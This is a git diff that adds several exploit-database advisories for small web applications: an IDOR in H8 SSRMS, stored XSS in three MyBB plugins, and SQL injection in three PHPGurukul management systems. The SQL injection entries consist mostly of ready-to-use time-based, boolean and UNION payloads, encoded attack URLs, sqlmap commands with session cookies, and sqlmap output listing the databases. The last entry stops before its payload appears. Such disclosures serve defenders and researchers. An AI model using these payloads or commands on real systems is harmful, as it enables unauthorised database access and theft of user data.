diff --git a/exploits/aspx/webapps/49508.txt b/exploits/aspx/webapps/49508.txt
new file mode 100644
index 000000000..ceff22c65
--- /dev/null
+++ b/exploits/aspx/webapps/49508.txt
@@ -0,0 +1,14 @@
+# Exploit Title: H8 SSRMS - 'id' IDOR
+# Date: 01/31/2021
+# Exploit Author: Mohammed Farhan
+# Vendor Homepage: https://www.height8tech.com/
+# Version: H8 SSRMS
+# Tested on: Windows 10
+
+
+Vulnerability Details
+======================
+Login to the application
+Navigate to Payment Section and Click on Print button.
+In QuotePrint.aspx, modify the id Parameter to View User details, Address,
+Payments, Phonenumber and Email of other Users
\ No newline at end of file
diff --git a/exploits/php/webapps/49500.txt b/exploits/php/webapps/49500.txt
new file mode 100644
index 000000000..e64cfc594
--- /dev/null
+++ b/exploits/php/webapps/49500.txt
@@ -0,0 +1,17 @@
+# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
+# Date: 1/25/2021
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/
+# Version: 1.4
+# Tested on: Windows 10
+
+1. Description:
+This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS.
+
+2. Proof of Concept:
+
+- Go to User CP -> Delete Account
+- Input a payload for delete account reason
+Payload will execute here.. admin/index.php?module=user-deleteaccount
\ No newline at end of file
diff --git a/exploits/php/webapps/49501.txt b/exploits/php/webapps/49501.txt
new file mode 100644
index 000000000..330025a64
--- /dev/null
+++ b/exploits/php/webapps/49501.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/animals.php and click on an animal
+
+2- then add the following payload to the url
+
+payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh
+url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --dbs
+
+example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.10.16#dev}
+|_ -| . [.] | .'| . |
+|___|_ [)]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 23:05:33 /2021-01-29/
+
+[23:05:34] [INFO] resuming back-end DBMS 'mysql'
+[23:05:34] [INFO] testing connection to the target URL
+you have not declared cookie(s), while server wants to set its own
+('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n]
+y
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: anid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND
+'jMXh'='jMXh
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: anid=9' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL--
+-
+---
+[23:05:36] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10, PHP
+back-end DBMS: MySQL >= 5.0.12
+[23:05:36] [INFO] fetching database names
+available databases [6]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[23:05:36] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49502.txt b/exploits/php/webapps/49502.txt
new file mode 100644
index 000000000..fd59d5b6a
--- /dev/null
+++ b/exploits/php/webapps/49502.txt
@@ -0,0 +1,82 @@
+# Exploit Title: User Management System 1.0 - 'uid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/admin/ and login with your account
+
+2- then go to http://localhost/admin/registered-users.php
+
+3- Click edit on any user and then add the following payload to the url
+
+payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
+url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT)
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --cookies="cookies here" --dbs
+
+example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3
+--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs
+
+ ___
+ __H__
+ ___ ___[,]_____ ___ ___ {1.4.10.16#dev}
+|_ -| . [)] | .'| . |
+|___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 22:55:16 /2021-01-29/
+
+[22:55:16] [INFO] resuming back-end DBMS 'mysql'
+[22:55:16] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: uid (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT
+1849 UNION SELECT 3460) END))
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
+---
+[22:55:16] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10
+back-end DBMS: MySQL >= 5.0.12
+[22:55:16] [INFO] fetching database names
+[22:55:16] [INFO] fetching number of databases
+[22:55:16] [INFO] resumed: 6
+[22:55:16] [INFO] resumed: mysql
+[22:55:16] [INFO] resumed: information_schema
+[22:55:16] [INFO] resumed: performance_schema
+[22:55:16] [INFO] resumed: sys
+[22:55:16] [INFO] resumed: umspsdb
+[22:55:16] [INFO] resumed: zmsdb
+available databases [6]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[22:55:16] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49503.txt b/exploits/php/webapps/49503.txt
new file mode 100644
index 000000000..d1885175e
--- /dev/null
+++ b/exploits/php/webapps/49503.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/index.php and login with your account
+
+2- then go to http://localhost/manage-normal-ticket.php
+
+3- Click view on any ticket. then add the following payload to the url
+
+payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH
+url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --cookies="cookies here" --dbs
+
+example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1
+--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs
+
+ ___
+ __H__
+ ___ ___[)]_____ ___ ___ {1.4.10.16#dev}
+|_ -| . [)] | .'| . |
+|___|_ [.]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 23:19:33 /2021-01-29/
+
+[23:19:34] [INFO] resuming back-end DBMS 'mysql'
+[23:19:34] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: viewid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB)
+AND 'QCDH'='QCDH
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 7 columns
+ Payload: viewid=1' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL--
+-
+---
+[23:19:34] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10
+back-end DBMS: MySQL >= 5.0.12
+[23:19:34] [INFO] fetching database names
+available databases [8]:
+[*] detsdb
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] ptmsdb
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[23:19:34] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49504.txt b/exploits/php/webapps/49504.txt
new file mode 100644
index 000000000..07202e363
--- /dev/null
+++ b/exploits/php/webapps/49504.txt
@@ -0,0 +1,15 @@
+# Exploit Title: MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting
+# Date: 11/28/2018
+# Author: 0xB9
+# Software Link: https://github.com/zainali99/trends-widget
+# Version: 1.2
+# Tested on: Windows 10
+
+1. Description:
+This plugin shows the most trending threads. Trending thread titles aren't sanitized to user input.
+
+2. Proof of Concept:
+
+- Have a trending thread in the widget
+- Change the thread title to a payload
+Anyone that visits the forum will execute payload
\ No newline at end of file
diff --git a/exploits/php/webapps/49505.txt b/exploits/php/webapps/49505.txt
new file mode 100644
index 000000000..ad1b56d39
--- /dev/null
+++ b/exploits/php/webapps/49505.txt
@@ -0,0 +1,16 @@
+# Exploit Title: MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting
+# Date: 7/23/2018
+# Author: 0xB9
+# Software Link: https://github.com/jamiesage123/Thread-Redirect
+# Version: 0.2.1
+# Tested on: Windows 10
+
+1. Description:
+This plugin allows threads to redirect to a URL with optional custom text. The custom text input is vulnerable to Cross-Site Scripting.
+
+2. Proof of Concept:
+
+- Create a new thread
+- Input any Thread Subject and Redirect URL you'd like
+- Use the following payload for Your Message